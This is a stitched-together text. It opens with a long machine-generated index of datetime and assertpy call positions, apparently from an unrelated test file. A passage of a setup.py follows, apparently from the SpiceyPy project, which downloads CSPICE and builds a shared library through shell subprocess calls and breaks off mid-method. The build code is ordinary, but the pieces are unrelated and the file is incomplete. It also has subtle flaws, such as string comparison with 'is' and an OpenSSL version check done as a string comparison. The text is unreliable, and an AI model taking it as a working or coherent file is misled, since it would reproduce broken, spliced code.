[((1613, 1638), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (1636, 1638), False, 'import datetime\n'), ((14298, 14328), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(60)'}), '(seconds=60)\n', (14316, 14328), False, 'import datetime\n'), ((1671, 1696), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (1694, 1696), False, 'import datetime\n'), ((2605, 2630), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (2628, 2630), False, 'import datetime\n'), ((6755, 6780), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (6778, 6780), False, 'import datetime\n'), ((8255, 8280), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (8278, 8280), False, 'import datetime\n'), ((9714, 9739), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (9737, 9739), False, 'import datetime\n'), ((9749, 9774), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (9772, 9774), False, 'import datetime\n'), ((12047, 12072), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (12070, 12072), False, 'import datetime\n'), ((14377, 14408), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(120)'}), '(seconds=120)\n', (14395, 14408), False, 'import datetime\n'), ((15891, 15921), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(90)'}), '(seconds=90)\n', (15909, 15921), False, 'import datetime\n'), ((17363, 17393), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(90)'}), '(seconds=90)\n', (17381, 17393), False, 'import datetime\n'), ((17403, 17434), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(120)'}), '(seconds=120)\n', (17421, 17434), False, 'import datetime\n'), ((17925, 17955), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(90)'}), '(seconds=90)\n', (17943, 17955), False, 'import datetime\n'), ((17965, 17996), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(120)'}), '(seconds=120)\n', (17983, 17996), False, 'import datetime\n'), ((1784, 1809), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (1807, 1809), False, 'import datetime\n'), ((1856, 1888), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (1860, 1888), False, 'from assertpy import assert_that, fail\n'), ((2176, 2208), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (2180, 2208), False, 'from assertpy import assert_that, fail\n'), ((2422, 2454), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (2426, 2454), False, 'from assertpy import assert_that, fail\n'), ((2716, 2741), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (2739, 2741), False, 'import datetime\n'), ((2787, 2819), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (2791, 2819), False, 'from assertpy import assert_that, fail\n'), ((3104, 3136), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (3108, 3136), False, 'from assertpy import assert_that, fail\n'), ((3348, 3380), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (3352, 3380), False, 'from assertpy import assert_that, fail\n'), ((3807, 3839), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (3811, 3839), False, 'from assertpy import assert_that, fail\n'), ((4177, 4209), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (4181, 4209), False, 'from assertpy import assert_that, fail\n'), ((4471, 4503), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (4475, 4503), False, 'from assertpy import assert_that, fail\n'), ((4910, 4942), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (4914, 4942), False, 'from assertpy import assert_that, fail\n'), ((5258, 5290), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (5262, 5290), False, 'from assertpy import assert_that, fail\n'), ((5542, 5574), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (5546, 5574), False, 'from assertpy import assert_that, fail\n'), ((5969, 6001), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (5973, 6001), False, 'from assertpy import assert_that, fail\n'), ((6287, 6319), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (6291, 6319), False, 'from assertpy import assert_that, fail\n'), ((6565, 6597), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (6569, 6597), False, 'from assertpy import assert_that, fail\n'), ((6880, 6905), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (6903, 6905), False, 'import datetime\n'), ((6958, 6990), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (6962, 6990), False, 'from assertpy import assert_that, fail\n'), ((7295, 7327), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (7299, 7327), False, 'from assertpy import assert_that, fail\n'), ((7608, 7633), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (7631, 7633), False, 'import datetime\n'), ((7698, 7730), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (7702, 7730), False, 'from assertpy import assert_that, fail\n'), ((8071, 8103), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (8075, 8103), False, 'from assertpy import assert_that, fail\n'), ((8374, 8399), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (8397, 8399), False, 'import datetime\n'), ((8449, 8481), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (8453, 8481), False, 'from assertpy import assert_that, fail\n'), ((8777, 8809), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (8781, 8809), False, 'from assertpy import assert_that, fail\n'), ((9081, 9106), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (9104, 9106), False, 'import datetime\n'), ((9168, 9200), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (9172, 9200), False, 'from assertpy import assert_that, fail\n'), ((9532, 9564), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (9536, 9564), False, 'from assertpy import assert_that, fail\n'), ((9868, 9893), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (9891, 9893), False, 'import datetime\n'), ((9907, 9932), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (9930, 9932), False, 'import datetime\n'), ((9984, 10016), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (9988, 10016), False, 'from assertpy import assert_that, fail\n'), ((10354, 10386), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (10358, 10386), False, 'from assertpy import assert_that, fail\n'), ((10575, 10600), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (10598, 10600), False, 'import datetime\n'), ((10653, 10685), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (10657, 10685), False, 'from assertpy import assert_that, fail\n'), ((10854, 10883), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(5)'}), '(minutes=5)\n', (10872, 10883), False, 'import datetime\n'), ((10898, 10928), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(10)'}), '(minutes=10)\n', (10916, 10928), False, 'import datetime\n'), ((11169, 11201), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (11173, 11201), False, 'from assertpy import assert_that, fail\n'), ((11547, 11579), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (11551, 11579), False, 'from assertpy import assert_that, fail\n'), ((11772, 11797), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (11795, 11797), False, 'import datetime\n'), ((11854, 11886), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (11858, 11886), False, 'from assertpy import assert_that, fail\n'), ((12109, 12138), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(5)'}), '(minutes=5)\n', (12127, 12138), False, 'import datetime\n'), ((12309, 12341), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (12313, 12341), False, 'from assertpy import assert_that, fail\n'), ((12674, 12706), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (12678, 12706), False, 'from assertpy import assert_that, fail\n'), ((12899, 12924), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (12922, 12924), False, 'import datetime\n'), ((12978, 13010), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (12982, 13010), False, 'from assertpy import assert_that, fail\n'), ((13179, 13208), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(5)'}), '(minutes=5)\n', (13197, 13208), False, 'import datetime\n'), ((13249, 13278), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(4)'}), '(minutes=4)\n', (13267, 13278), False, 'import datetime\n'), ((13339, 13364), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (13362, 13364), False, 'import datetime\n'), ((13448, 13480), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (13452, 13480), False, 'from assertpy import assert_that, fail\n'), ((13821, 13853), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (13825, 13853), False, 'from assertpy import assert_that, fail\n'), ((14050, 14075), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (14073, 14075), False, 'import datetime\n'), ((14133, 14165), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (14137, 14165), False, 'from assertpy import assert_that, fail\n'), ((14518, 14548), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(90)'}), '(seconds=90)\n', (14536, 14548), False, 'import datetime\n'), ((14601, 14633), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (14605, 14633), False, 'from assertpy import assert_that, fail\n'), ((14916, 14948), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (14920, 14948), False, 'from assertpy import assert_that, fail\n'), ((15250, 15280), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(90)'}), '(seconds=90)\n', (15268, 15280), False, 'import datetime\n'), ((15345, 15377), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (15349, 15377), False, 'from assertpy import assert_that, fail\n'), ((15696, 15728), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (15700, 15728), False, 'from assertpy import assert_that, fail\n'), ((16025, 16055), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(90)'}), '(seconds=90)\n', (16043, 16055), False, 'import datetime\n'), ((16105, 16137), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (16109, 16137), False, 'from assertpy import assert_that, fail\n'), ((16411, 16443), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (16415, 16443), False, 'from assertpy import assert_that, fail\n'), ((16736, 16766), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(90)'}), '(seconds=90)\n', (16754, 16766), False, 'import datetime\n'), ((16828, 16860), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (16832, 16860), False, 'from assertpy import assert_that, fail\n'), ((17170, 17202), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (17174, 17202), False, 'from assertpy import assert_that, fail\n'), ((17538, 17568), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(30)'}), '(seconds=30)\n', (17556, 17568), False, 'import datetime\n'), ((17582, 17612), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(40)'}), '(seconds=40)\n', (17600, 17612), False, 'import datetime\n'), ((17664, 17696), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (17668, 17696), False, 'from assertpy import assert_that, fail\n'), ((18108, 18138), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(90)'}), '(seconds=90)\n', (18126, 18138), False, 'import datetime\n'), ((18152, 18183), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(120)'}), '(seconds=120)\n', (18170, 18183), False, 'import datetime\n'), ((18239, 18271), 'assertpy.fail', 'fail', (['"""should have raised error"""'], {}), "('should have raised error')\n", (18243, 18271), False, 'from assertpy import assert_that, fail\n'), ((1701, 1716), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (1712, 1716), False, 'from assertpy import assert_that, fail\n'), ((2635, 2650), 'assertpy.assert_that', 'assert_that', (['d2'], {}), '(d2)\n', (2646, 2650), False, 'from assertpy import assert_that, fail\n'), ((3551, 3566), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (3562, 3566), False, 'from assertpy import assert_that, fail\n'), ((3682, 3707), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (3705, 3707), False, 'import datetime\n'), ((3710, 3736), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(1)'}), '(days=1)\n', (3728, 3736), False, 'import datetime\n'), ((4669, 4684), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (4680, 4684), False, 'from assertpy import assert_that, fail\n'), ((4790, 4815), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (4813, 4815), False, 'import datetime\n'), ((4818, 4844), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(1)'}), '(days=1)\n', (4836, 4844), False, 'import datetime\n'), ((5737, 5752), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (5748, 5752), False, 'from assertpy import assert_that, fail\n'), ((5852, 5877), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (5875, 5877), False, 'import datetime\n'), ((5880, 5906), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(1)'}), '(days=1)\n', (5898, 5906), False, 'import datetime\n'), ((6785, 6800), 'assertpy.assert_that', 'assert_that', (['d2'], {}), '(d2)\n', (6796, 6800), False, 'from assertpy import assert_that, fail\n'), ((7489, 7504), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (7500, 7504), False, 'from assertpy import assert_that, fail\n'), ((8285, 8300), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (8296, 8300), False, 'from assertpy import assert_that, fail\n'), ((8968, 8983), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (8979, 8983), False, 'from assertpy import assert_that, fail\n'), ((9779, 9794), 'assertpy.assert_that', 'assert_that', (['d2'], {}), '(d2)\n', (9790, 9794), False, 'from assertpy import assert_that, fail\n'), ((10933, 10948), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (10944, 10948), False, 'from assertpy import assert_that, fail\n'), ((11035, 11064), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(5)'}), '(minutes=5)\n', (11053, 11064), False, 'import datetime\n'), ((11083, 11113), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(10)'}), '(minutes=10)\n', (11101, 11113), False, 'import datetime\n'), ((12077, 12092), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (12088, 12092), False, 'from assertpy import assert_that, fail\n'), ((12200, 12229), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(5)'}), '(minutes=5)\n', (12218, 12229), False, 'import datetime\n'), ((12270, 12299), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(1)'}), '(minutes=1)\n', (12288, 12299), False, 'import datetime\n'), ((13213, 13228), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (13224, 13228), False, 'from assertpy import assert_that, fail\n'), ((13409, 13438), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(5)'}), '(minutes=5)\n', (13427, 13438), False, 'import datetime\n'), ((14413, 14428), 'assertpy.assert_that', 'assert_that', (['d2'], {}), '(d2)\n', (14424, 14428), False, 'from assertpy import assert_that, fail\n'), ((15121, 15136), 'assertpy.assert_that', 'assert_that', (['t1'], {}), '(t1)\n', (15132, 15136), False, 'from assertpy import assert_that, fail\n'), ((15926, 15941), 'assertpy.assert_that', 'assert_that', (['t1'], {}), '(t1)\n', (15937, 15941), False, 'from assertpy import assert_that, fail\n'), ((16613, 16628), 'assertpy.assert_that', 'assert_that', (['t1'], {}), '(t1)\n', (16624, 16628), False, 'from assertpy import assert_that, fail\n'), ((17439, 17454), 'assertpy.assert_that', 'assert_that', (['d2'], {}), '(d2)\n', (17450, 17454), False, 'from assertpy import assert_that, fail\n'), ((18001, 18016), 'assertpy.assert_that', 'assert_that', (['t1'], {}), '(t1)\n', (18012, 18016), False, 'from assertpy import assert_that, fail\n'), ((1818, 1833), 'assertpy.assert_that', 'assert_that', (['d2'], {}), '(d2)\n', (1829, 1833), False, 'from assertpy import assert_that, fail\n'), ((2136, 2152), 'assertpy.assert_that', 'assert_that', (['(123)'], {}), '(123)\n', (2147, 2152), False, 'from assertpy import assert_that, fail\n'), ((2383, 2398), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (2394, 2398), False, 'from assertpy import assert_that, fail\n'), ((2750, 2765), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (2761, 2765), False, 'from assertpy import assert_that, fail\n'), ((3065, 3081), 'assertpy.assert_that', 'assert_that', (['(123)'], {}), '(123)\n', (3076, 3081), False, 'from assertpy import assert_that, fail\n'), ((3310, 3325), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (3321, 3325), False, 'from assertpy import assert_that, fail\n'), ((3745, 3760), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (3756, 3760), False, 'from assertpy import assert_that, fail\n'), ((4113, 4129), 'assertpy.assert_that', 'assert_that', (['(123)'], {}), '(123)\n', (4124, 4129), False, 'from assertpy import assert_that, fail\n'), ((4408, 4423), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (4419, 4423), False, 'from assertpy import assert_that, fail\n'), ((4853, 4868), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (4864, 4868), False, 'from assertpy import assert_that, fail\n'), ((5199, 5215), 'assertpy.assert_that', 'assert_that', (['(123)'], {}), '(123)\n', (5210, 5215), False, 'from assertpy import assert_that, fail\n'), ((5484, 5499), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (5495, 5499), False, 'from assertpy import assert_that, fail\n'), ((5915, 5930), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (5926, 5930), False, 'from assertpy import assert_that, fail\n'), ((6231, 6247), 'assertpy.assert_that', 'assert_that', (['(123)'], {}), '(123)\n', (6242, 6247), False, 'from assertpy import assert_that, fail\n'), ((6510, 6525), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (6521, 6525), False, 'from assertpy import assert_that, fail\n'), ((6914, 6929), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (6925, 6929), False, 'from assertpy import assert_that, fail\n'), ((7250, 7265), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (7261, 7265), False, 'from assertpy import assert_that, fail\n'), ((7642, 7657), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (7653, 7657), False, 'from assertpy import assert_that, fail\n'), ((8014, 8029), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (8025, 8029), False, 'from assertpy import assert_that, fail\n'), ((8408, 8423), 'assertpy.assert_that', 'assert_that', (['d2'], {}), '(d2)\n', (8419, 8423), False, 'from assertpy import assert_that, fail\n'), ((8735, 8750), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (8746, 8750), False, 'from assertpy import assert_that, fail\n'), ((9115, 9130), 'assertpy.assert_that', 'assert_that', (['d2'], {}), '(d2)\n', (9126, 9130), False, 'from assertpy import assert_that, fail\n'), ((9478, 9493), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (9489, 9493), False, 'from assertpy import assert_that, fail\n'), ((9941, 9956), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (9952, 9956), False, 'from assertpy import assert_that, fail\n'), ((10309, 10324), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (10320, 10324), False, 'from assertpy import assert_that, fail\n'), ((10609, 10624), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (10620, 10624), False, 'from assertpy import assert_that, fail\n'), ((11122, 11137), 'assertpy.assert_that', 'assert_that', (['d2'], {}), '(d2)\n', (11133, 11137), False, 'from assertpy import assert_that, fail\n'), ((11498, 11513), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (11509, 11513), False, 'from assertpy import assert_that, fail\n'), ((11806, 11821), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (11817, 11821), False, 'from assertpy import assert_that, fail\n'), ((12238, 12253), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (12249, 12253), False, 'from assertpy import assert_that, fail\n'), ((12628, 12643), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (12639, 12643), False, 'from assertpy import assert_that, fail\n'), ((12933, 12948), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (12944, 12948), False, 'from assertpy import assert_that, fail\n'), ((13373, 13388), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (13384, 13388), False, 'from assertpy import assert_that, fail\n'), ((13771, 13786), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (13782, 13786), False, 'from assertpy import assert_that, fail\n'), ((14084, 14099), 'assertpy.assert_that', 'assert_that', (['d1'], {}), '(d1)\n', (14095, 14099), False, 'from assertpy import assert_that, fail\n'), ((14557, 14572), 'assertpy.assert_that', 'assert_that', (['t1'], {}), '(t1)\n', (14568, 14572), False, 'from assertpy import assert_that, fail\n'), ((14871, 14886), 'assertpy.assert_that', 'assert_that', (['t1'], {}), '(t1)\n', (14882, 14886), False, 'from assertpy import assert_that, fail\n'), ((15289, 15304), 'assertpy.assert_that', 'assert_that', (['t1'], {}), '(t1)\n', (15300, 15304), False, 'from assertpy import assert_that, fail\n'), ((15639, 15654), 'assertpy.assert_that', 'assert_that', (['t1'], {}), '(t1)\n', (15650, 15654), False, 'from assertpy import assert_that, fail\n'), ((16064, 16079), 'assertpy.assert_that', 'assert_that', (['t2'], {}), '(t2)\n', (16075, 16079), False, 'from assertpy import assert_that, fail\n'), ((16369, 16384), 'assertpy.assert_that', 'assert_that', (['t1'], {}), '(t1)\n', (16380, 16384), False, 'from assertpy import assert_that, fail\n'), ((16775, 16790), 'assertpy.assert_that', 'assert_that', (['t2'], {}), '(t2)\n', (16786, 16790), False, 'from assertpy import assert_that, fail\n'), ((17116, 17131), 'assertpy.assert_that', 'assert_that', (['t1'], {}), '(t1)\n', (17127, 17131), False, 'from assertpy import assert_that, fail\n'), ((17621, 17636), 'assertpy.assert_that', 'assert_that', (['t1'], {}), '(t1)\n', (17632, 17636), False, 'from assertpy import assert_that, fail\n'), ((18192, 18207), 'assertpy.assert_that', 'assert_that', (['d2'], {}), '(d2)\n', (18203, 18207), False, 'from assertpy import assert_that, fail\n')]
|
"""
The MIT License (MIT)
Copyright (c) [2015-2019] [<NAME>]
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from setuptools import setup, Command
from setuptools.command.install import install
from setuptools.command.build_py import build_py
from setuptools.command.test import test as TestCommand
from setuptools.dist import Distribution
import ssl
import sys
import os
import subprocess
import platform
import shutil
__author__ = 'AndrewAnnex'
# Get OS platform
host_OS = platform.system()
# Get platform is Unix-like OS or not
is_unix = host_OS in ("Linux", "Darwin", "FreeBSD")
# Get current working directory
root_dir = os.path.dirname(os.path.realpath(__file__))
# Make the directory path for cspice
cspice_dir = os.path.join(root_dir, 'cspice')
# Make the directory path for cspice/lib
lib_dir = os.path.join(cspice_dir, 'lib')
TEST_DEPENDENCIES = ['setuptools>=38.0.0','numpy<=1.16.4;python_version<"3.5"', 'numpy>=1.17.0;python_version>="3.5"', 'six>=1.9.0', 'pytest>=2.9.0']
DEPENDENCIES = ['setuptools>=38.0.0','numpy<=1.16.4;python_version<"3.5"', 'numpy>=1.17.0;python_version>="3.5"', 'six>=1.9.0', 'certifi>=2017.1.23']
REQUIRES = ['numpy', 'six']
# If we have an old version of OpenSSL, CSPICE will be downloaded
# (if required) using urllib3. Extend the list of required packages.
if ssl.OPENSSL_VERSION < 'OpenSSL 1.0.1g':
DEPENDENCIES.extend(['urllib3[secure]>=1.22', 'pyOpenSSL>=17.3.0'])
class InstallCSpice(object):
@staticmethod
def get_cspice():
if InstallCSpice.check_for_spice():
print("Host OS: {0}".format(host_OS))
if is_unix:
InstallCSpice.unix_method()
elif host_OS == "Windows":
InstallCSpice.windows_method()
else:
sys.exit("Unsupported OS: {0}".format(host_OS))
@staticmethod
def check_for_spice():
print('Checking the path', cspice_dir)
if not os.path.exists(cspice_dir):
import getspice
message = 'Unable to find CSPICE at {0}. Attempting to Download CSPICE For you:'.format(cspice_dir)
print(message)
# Download cspice using getspice.py
getspice.GetCSPICE(version='N0066')
if not os.path.exists(cspice_dir):
message = 'Unable to find CSPICE at {0}. Exiting'.format(cspice_dir)
sys.exit(message)
return True
return False
@staticmethod
def unpack_cspice():
if is_unix:
cspice_lib = os.path.join(lib_dir, ("cspice.lib" if host_OS is "Windows" else "cspice.a"))
csupport_lib = os.path.join(lib_dir, ("csupport.lib" if host_OS is "Windows" else "csupport.a"))
if os.path.exists(cspice_lib) and os.path.exists(csupport_lib):
cwd = os.getcwd()
try:
os.chdir(lib_dir)
if host_OS is "Windows":
raise BaseException("Windows is not supported in this build method")
elif is_unix:
for lib in ["ar -x cspice.a", "ar -x csupport.a"]:
unpack_lib_process = subprocess.Popen(lib, shell=True)
process_status = os.waitpid(unpack_lib_process.pid, 0)[1]
if process_status != 0:
raise BaseException('{0}'.format(process_status))
else:
raise BaseException("Unsupported OS: {0}".format(host_OS))
except BaseException as error:
status = error.args
sys.exit('Error: cspice object file extraction failed with exit status: {0}'.format(status))
finally:
os.chdir(cwd)
else:
error_Message = "Error, cannot find CSPICE " \
"static libraries at {0}".format(lib_dir)
sys.exit(error_Message)
@staticmethod
def build_library():
# Get the current working directory
cwd = os.getcwd()
if is_unix:
try:
os.chdir(lib_dir)
# find a way to make this work via Extension and setuptools, not using popen.
build_lib = subprocess.Popen('gcc -shared -fPIC -lm *.o -o spice.so', shell=True)
status = os.waitpid(build_lib.pid, 0)[1]
if status != 0:
raise BaseException('{0}'.format(status))
success = os.path.exists(os.path.join(os.getcwd(), 'spice.so'))
if not success:
raise BaseException("Did not find spice.so, build went badly.")
except BaseException as errorInst:
status = errorInst.args
sys.exit('Error: compilation of shared spice.so build exit status: {0}'.format(status))
elif host_OS == "Windows":
try:
destination = os.path.join(cspice_dir, "src", "cspice")
defFile = os.path.join(root_dir, "appveyor", "cspice.def")
makeBat = os.path.join(root_dir, "appveyor", "makeDynamicSpice.bat")
shutil.copy(defFile, destination)
shutil.copy(makeBat, destination)
# run the script
os.chdir(destination)
windows_build = subprocess.Popen("makeDynamicSpice.bat", shell=True)
status = windows_build.wait()
if status != 0:
raise BaseException('{0}'.format(status))
except BaseException as error:
sys.exit("Build failed with: {0}".format(error.args))
# Change back to the stored 'current working directory
os.chdir(cwd)
@staticmethod
def move_to_root_directory():
sharedlib = 'spice.so' if is_unix else 'cspice.dll'
destination = os.path.join(root_dir, 'spiceypy', 'utils', sharedlib)
if not os.path.isfile(destination):
if is_unix:
target = os.path.join(cspice_dir, 'lib', sharedlib)
else:
target = os.path.join(cspice_dir, 'src', 'cspice', sharedlib)
print("Attempting to move: {0} to: {1}".format(target, destination))
try:
os.rename(target, destination)
except BaseException as e:
sys.exit('{0} file not found, what happend?: {1}'.format(sharedlib, e))
@staticmethod
def cleanup():
# Remove CSPICE folder
try:
shutil.rmtree(os.path.join(os.getcwd(), "cspice"))
except OSError as e:
print("Error Cleaning up cspice folder")
raise e
@staticmethod
def unix_method():
# Unpack cspice.a and csupport.a
InstallCSpice.unpack_cspice()
# Build the shared Library
